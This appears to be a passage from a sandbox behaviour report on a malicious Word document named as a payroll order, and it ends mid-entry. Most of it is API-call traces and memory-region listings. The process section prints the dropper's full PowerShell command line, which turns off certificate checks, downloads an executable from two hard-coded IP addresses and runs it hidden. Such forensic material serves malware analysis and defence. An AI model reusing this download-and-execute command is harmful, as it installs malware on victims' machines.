(This=0x7feff045380, pv=0x811c8c0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x8122e90) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x810c330) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x3f98d50) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x8096ef0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7ba4c60) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x81e43e0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7e14e60) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x8143e40) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7f18910) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7f18730) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7f18610) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7f18430) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x8070660) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x81e4260) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x813ef10) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x813eea0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7f18550) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x813ee30) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x8070820) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7f184f0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7fc2220) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7f18490) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7f183d0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x80707b0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7fc21d0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x8003a10) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x8070740) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x80706d0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x81e41a0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x80705f0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x817bd50) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x8070580) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x819f9e0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x26fe290) [0217.477] IMalloc:Realloc (This=0x7feff045380, pv=0x7fc2270, cb=0x0) returned 0x0 [0217.477] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8188430 [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x8188250) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x7dff7b0) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x7f185b0) [0217.477] IUnknown:Release (This=0x7f72450) returned 0x3 [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x80704a0) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x815d250) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x817bc50) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x7dff810) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x8005230) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x811bcf0) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x8188430) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x80752d0) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x814ce60) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x26fee90) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x26fef50) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x811bc60) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x81f2cb0) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x81f6d40) [0217.477] IMalloc:Free (This=0x7feff045380, pv=0x81ea690) [0217.477] VirtualFree (lpAddress=0x3b00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0217.478] VirtualFree (lpAddress=0x3b10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0217.478] VirtualFree (lpAddress=0x40d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0217.479] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0217.479] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x8134a80) [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x7dff180) [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x8148620) [0217.480] IUnknown:Release (This=0x7f72500) returned 0x0 [0217.480] IUnknown:Release (This=0x8128768) returned 0x0 [0217.480] IUnknown:Release (This=0x81287c0) returned 0x0 [0217.480] IUnknown:Release (This=0x7f72088) returned 0x0 [0217.480] IUnknown:Release (This=0x7f72138) returned 0x0 [0217.480] IUnknown:Release (This=0x7f723a0) returned 0x2 [0217.480] IUnknown:Release (This=0x7f7aa08) returned 0x0 [0217.480] IUnknown:Release (This=0x7f7aab8) returned 0x0 [0217.480] IUnknown:Release (This=0x7f7ab68) returned 0x0 [0217.480] IMalloc:Realloc (This=0x7feff045380, pv=0x811be10, cb=0x0) returned 0x0 [0217.480] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x80752d0 [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x8188240) [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x7dff150) [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x81968e0) [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x81f2660) [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x7dff1b0) [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x80054b0) [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x811bfc0) [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x80752d0) [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x80753d0) [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x81ea280) [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x26ff010) [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x26ff0d0) [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x811bea0) [0217.480] IMalloc:Free (This=0x7feff045380, pv=0x8005430) [0217.480] wcsncpy_s (in: _Destination=0x209ae0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0x0 [0217.480] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", cchLength=0x37 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc") returned 0x37 [0217.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", cchWideChar=56, lpMultiByteStr=0x209a10, cbMultiByte=112, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\order_payroll_81154032.doc", lpUsedDefaultChar=0x0) returned 56 [0217.480] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 0 [0217.480] IMalloc:Realloc (This=0x7feff045380, pv=0x7fc2310, cb=0x0) returned 0x0 [0217.481] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x80753d0 [0217.481] IMalloc:Free (This=0x7feff045380, pv=0x8188450) [0217.481] IMalloc:Free (This=0x7feff045380, pv=0x7dfe910) [0217.481] IMalloc:Free (This=0x7feff045380, pv=0x7f18670) [0217.481] IMalloc:Free (This=0x7feff045380, pv=0x81e9230) [0217.481] IMalloc:Free (This=0x7feff045380, pv=0x7dfebb0) [0217.481] IMalloc:Free (This=0x7feff045380, pv=0x817bc30) [0217.481] IMalloc:Free (This=0x7feff045380, pv=0x811a0d0) [0217.481] IMalloc:Free (This=0x7feff045380, pv=0x80753d0) [0217.481] IMalloc:Free (This=0x7feff045380, pv=0x81883c0) [0217.481] IMalloc:Free (This=0x7feff045380, pv=0x81e31e0) [0217.481] IMalloc:Free (This=0x7feff045380, pv=0x26ff610) [0217.481] IMalloc:Free (This=0x7feff045380, pv=0x8004410) [0217.481] IMalloc:Free (This=0x7feff045380, pv=0x80044f0) [0217.481] GetCurrentThreadId () returned 0x94c [0217.481] GetCurrentThreadId () returned 0x94c [0217.482] IMalloc:Free (This=0x7feff045380, pv=0x80703c0) [0217.482] IMalloc:Free (This=0x7feff045380, pv=0x8188420) [0217.482] IMalloc:Free (This=0x7feff045380, pv=0x7d55650) [0217.482] IMalloc:Free (This=0x7feff045380, pv=0x8196780) [0217.482] IMalloc:Free (This=0x7feff045380, pv=0x81966d0) [0217.794] SysStringByteLen (bstr="潎浲污") returned 0x6 [0217.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e7f178, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0217.794] SysStringByteLen (bstr="潎浲污") returned 0x6 [0217.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7e7f178, cbMultiByte=7, lpWideCharStr=0x7dfea38, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0217.837] IMalloc:Free (This=0x7feff045380, pv=0x810ff30) [0217.837] IUnknown:Release (This=0x7edf740) returned 0x3 [0217.837] IUnknown:Release (This=0x3dd7b80) returned 0xa [0217.837] IUnknown:Release (This=0x7ee0550) returned 0x4 [0217.837] IUnknown:Release (This=0x7edffb0) returned 0x2 [0217.837] CExposedDocFile::Release () returned 0x2 [0217.838] CExposedDocFile::Release () returned 0x1 [0217.838] IMalloc:Free (This=0x7feff045380, pv=0x8188410) [0217.838] IMalloc:Free (This=0x7feff045380, pv=0x7d55790) [0217.838] IMalloc:Free (This=0x7feff045380, pv=0x80702e0) [0217.838] GetCurrentThreadId () returned 0x94c [0217.838] SetCursor (hCursor=0x10007) returned 0x10007 [0217.838] CExposedDocFile::Release () returned 0x0 [0217.838] CExposedDocFile::Release () returned 0x0 [0217.838] GetCurrentThreadId () returned 0x94c [0217.838] GetCurrentThreadId () returned 0x94c [0217.838] IMalloc:Free (This=0x7feff045380, pv=0x8070510) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x7d55bd0) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x7d55b90) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x7d55b50) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x7d556d0) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x7d55a50) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x811c560) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x3e6c410) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x3e6ccb0) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x3e6d550) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x3e6d100) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x3e6d9a0) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x81f83a0) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x7dfefa0) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x7dfef40) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x8134670) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x817a5f0) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x81e23b0) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x7f43d60) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x26ff6d0) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x817bc10) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x26ff3d0) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x8179450) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x7f18370) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x819fce0) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x26ff250) [0217.839] IMalloc:Realloc (This=0x7feff045380, pv=0x7dfef10, cb=0x0) returned 0x0 [0217.839] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8188410 [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x81883b0) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x7dfebe0) [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x7dfee50) [0217.839] IUnknown:Release (This=0x7f72450) returned 0x0 [0217.839] IMalloc:Free (This=0x7feff045380, pv=0x8070430) [0217.840] IMalloc:Free (This=0x7feff045380, pv=0x81f5c30) [0217.840] IMalloc:Free (This=0x7feff045380, pv=0x817acf0) [0217.840] IMalloc:Free (This=0x7feff045380, pv=0x7dfee20) [0217.840] IMalloc:Free (This=0x7feff045380, pv=0x8177630) [0217.840] IMalloc:Free (This=0x7feff045380, pv=0x811c440) [0217.840] IMalloc:Free (This=0x7feff045380, pv=0x8188410) [0217.840] IMalloc:Free (This=0x7feff045380, pv=0x8075240) [0217.840] IMalloc:Free (This=0x7feff045380, pv=0x81f5850) [0217.840] IConnectionPoint:Unadvise (This=0x7f18190, dwCookie=0x4) returned 0x0 [0217.840] IMalloc:Free (This=0x7feff045380, pv=0x7dfeee0) [0217.840] IUnknown:Release (This=0x7f18190) returned 0x1 [0217.840] IConnectionPoint:Unadvise (This=0x7f180d0, dwCookie=0x4) returned 0x0 [0217.840] IMalloc:Free (This=0x7feff045380, pv=0x7dfec70) [0217.840] IUnknown:Release (This=0x7f180d0) returned 0x1 [0217.840] IMalloc:Free (This=0x7feff045380, pv=0x26ff550) [0217.840] IMalloc:Free (This=0x7feff045380, pv=0x26ff490) [0217.840] IMalloc:Free (This=0x7feff045380, pv=0x811c3b0) [0217.840] IMalloc:Free (This=0x7feff045380, pv=0x81883a0) [0217.840] wcsncpy_s (in: _Destination=0x20c230, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0217.840] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0217.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x20c160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0217.840] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0217.845] IMalloc:Realloc (This=0x7feff045380, pv=0x81883d0, cb=0x0) returned 0x0 [0217.845] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x81883d0 [0217.846] IMalloc:Free (This=0x7feff045380, pv=0x8188400) [0217.846] IMalloc:Free (This=0x7feff045380, pv=0x7dfeac0) [0217.846] IMalloc:Free (This=0x7feff045380, pv=0x81883f0) [0217.846] IMalloc:Free (This=0x7feff045380, pv=0x81e39a0) [0217.846] IMalloc:Free (This=0x7feff045380, pv=0x7dfef70) [0217.846] IMalloc:Free (This=0x7feff045380, pv=0x817bc90) [0217.846] IMalloc:Free (This=0x7feff045380, pv=0x811c710) [0217.846] IMalloc:Free (This=0x7feff045380, pv=0x81883d0) [0217.846] IMalloc:Free (This=0x7feff045380, pv=0x81883e0) [0217.846] IMalloc:Free (This=0x7feff045380, pv=0x81e35c0) [0217.846] IMalloc:Free (This=0x7feff045380, pv=0x26ff790) [0217.846] IMalloc:Free (This=0x7feff045380, pv=0x7d0c9a0) [0217.846] IMalloc:Free (This=0x7feff045380, pv=0x817bab0) [0217.846] GetCurrentThreadId () returned 0x94c [0217.846] GetCurrentThreadId () returned 0x94c [0217.847] IMalloc:Free (This=0x7feff045380, pv=0x8196570) [0217.853] SetCursor (hCursor=0x10007) returned 0x10007 [0218.154] SendMessageA (hWnd=0x101fa, Msg=0x10, wParam=0x0, lParam=0x0) returned 0x0 [0218.154] IsWindow (hWnd=0x0) returned 0 [0218.154] IsWindow (hWnd=0x0) returned 0 [0218.154] IsWindow (hWnd=0x0) returned 0 [0218.154] PeekMessageA (in: lpMsg=0x20f3d0, hWnd=0x101fa, wMsgFilterMin=0x1007, wMsgFilterMax=0x1007, wRemoveMsg=0x3 | out: lpMsg=0x20f3d0) returned 0 [0218.154] DestroyWindow (hWnd=0x101fa) returned 1 [0218.155] DeleteDC (hdc=0x22010828) returned 1 [0218.155] GlobalDeleteAtom (nAtom=0xc11d) returned 0x0 [0218.155] IMalloc:Free (This=0x7feff045380, pv=0x7f50fa0) [0218.155] IMalloc:Free (This=0x7feff045380, pv=0x7d97700) [0218.155] IMalloc:Free (This=0x7feff045380, pv=0x7d975b0) [0218.155] IMalloc:Free (This=0x7feff045380, pv=0x7e71090) [0218.155] IMalloc:Free (This=0x7feff045380, pv=0x7fbceb0) [0218.155] IMalloc:Free (This=0x7feff045380, pv=0x80d6ba0) [0218.155] WaitForSingleObject (hHandle=0xa04, dwMilliseconds=0x12c) returned 0x0 [0218.177] CloseHandle (hObject=0xa04) returned 1 [0218.177] IMalloc:Free (This=0x7feff045380, pv=0x3ea36c0) [0218.177] IMalloc:Free (This=0x7feff045380, pv=0x3ea2a90) [0218.177] IMalloc:Free (This=0x7feff045380, pv=0x3ea2ea0) [0218.178] IMalloc:Free (This=0x7feff045380, pv=0x3ea32b0) [0218.178] DllDebugObjectRPCHook () returned 0x1 [0218.195] FreeLibrary (hLibModule=0x7fee34b0000) returned 1 Thread: id = 24 os_tid = 0xa18 Thread: id = 25 os_tid = 0xac0 Thread: id = 26 os_tid = 0xac4 Thread: id = 34 os_tid = 0xb44 Thread: id = 105 os_tid = 0x8f8 Thread: id = 304 os_tid = 0xafc Thread: id = 306 os_tid = 0x174 Thread: id = 367 os_tid = 0x7fc Process: id = "2" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x2b6a3000" os_pid = "0xac8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x948" cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; (new-object system.net.webclient <#replace ext#> ).downloadfile($string1,($env:temp+'\\fulezad.exe'));}catch{$beos1=0;}return $beos1;}$mmb1=@('64.44.51.87/electra.crm','89.46.223.114/electra.crm');foreach ($bifa in $mmb1){if(split-strings('https://'+$bifa) -eq 1){break;} };<#validate component#>start-process ($env:temp+'\\fulezad.exe') -windowstyle hidden;\"" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 494 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 495 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 496 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 497 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 498 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 499 start_va = 0x13fbe0000 end_va = 0x13fc56fff entry_point = 0x13fbe0000 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 500 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 501 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 502 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 503 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 509 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 510 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 511 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 512 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 513 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 514 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 515 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 516 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 517 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 518 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 519 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 520 start_va = 0x7fee5cd0000 end_va = 0x7fee5d3efff entry_point = 0x7fee5cd0000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 521 start_va = 0x7fefb100000 end_va = 0x7fefb118fff entry_point = 0x7fefb100000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 522 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 523 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 524 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 525 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 526 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 527 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 528 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 529 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 530 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 531 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 532 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 533 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 534 start_va = 0x170000 end_va = 0x172fff entry_point = 0x170000 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 535 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 536 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 537 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 538 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 539 start_va = 0x3c0000 end_va = 0x547fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 540 start_va = 0x550000 end_va = 0x6d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 541 start_va = 0x6e0000 end_va = 0x1adffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 542 start_va = 0x1ae0000 end_va = 0x1bdffff entry_point = 0x0 region_type = private name = "private_0x0000000001ae0000" filename = "" Region: id = 543 start_va = 0x1c40000 end_va = 0x1c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 544 start_va = 0x1de0000 end_va = 0x1e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 545 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 546 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 547 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 548 start_va = 0x7fefbe50000 end_va = 0x7fefbea5fff entry_point = 0x7fefbe50000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 549 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 550 start_va = 0x1ce0000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 551 start_va = 0x1e60000 end_va = 0x1f3efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e60000" filename = "" Region: id = 552 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = 